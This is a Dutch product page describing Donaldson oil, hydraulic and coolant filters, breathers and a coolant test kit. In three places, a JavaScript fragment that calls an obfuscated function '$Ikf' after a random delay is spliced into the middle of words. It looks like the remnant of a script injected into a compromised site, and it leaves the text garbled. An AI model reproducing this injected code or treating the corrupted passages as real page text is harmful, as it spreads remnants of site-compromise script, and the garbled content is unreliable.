Mobiele kranen, vrachtwagens of bussen.

 

Opdraaibare oliefilters

De “long life” oliefilters ontwikkeld door Donaldson, beschermen het prestatievermogen van uw machines zodat u zich kan focussen op wat echt belangrijk is: uw werk doen! . Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Filterpatronen

Donaldson omvat een volledig gamma oliefilterpatronen voor alle merken. .Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Vervangingselementen

Wij bieden u een ongeëvenaard gamma vervangingselementen en opdraaifilters voor hydraulische toepassingen. Donaldson heeft daarenboven een grote waaier aan filtermedia die u toelaten om de filter te kiezen die het best beantwoordt aan de zuiveringseisen van uw hydraulisch systeem. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoekt naar uw vervangingsfilter via de volgende link.

Ontluchters

Beschikbaar in een breed gamma modellen, materialen en afmetingen. De ontluchters zorgen voor een aanvoer van propere lucht in uw reservoirs en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere opslagapparatuur waar luchtcirculatie voorkomt naargelang het niveau van de vloeistoffen varieert.
Roest, kalkaanslag, vuil…zijn enkele van de vele onzuiverheden waar een motor mee wordt geconfronteerd. Onvoldoende bescherming kan leiden tot motorpech of erger. Het koelcircuit moet de temperatuur van de motor op het juiste niveau houden en zodoende een minimum aan brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof  verbruiken. Donaldson koelvloeistoffilters verwijderen de onzuiverheden, vermijden een filterverstopping en dragen bij tot de goede werking van de motor. Filtratie van koelvloeistof is een kwestie van evenwicht. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren.  

Koelvloeistoffilters en vervangingspatronen

Koelvloeistoffilters zijn ontworpen om het vereiste chemisch evenwicht in standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te houden en de aanwezigheid van vervuilende deeltjes binnen het koelcircuit van de motor te verminderen. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoek uw vervangingspatroon via deze link.

Testset voor koelvloeistof (chemisch evenwicht)

Wij bieden u een snelwerkende testset aan om het chemisch evenwicht van de vloeistof binnen uw koelcircuit te behouden. Deze kits zijn zeer practisch om het vereiste evenwicht te controleren.

Donaldson & Wabco luchtdrogers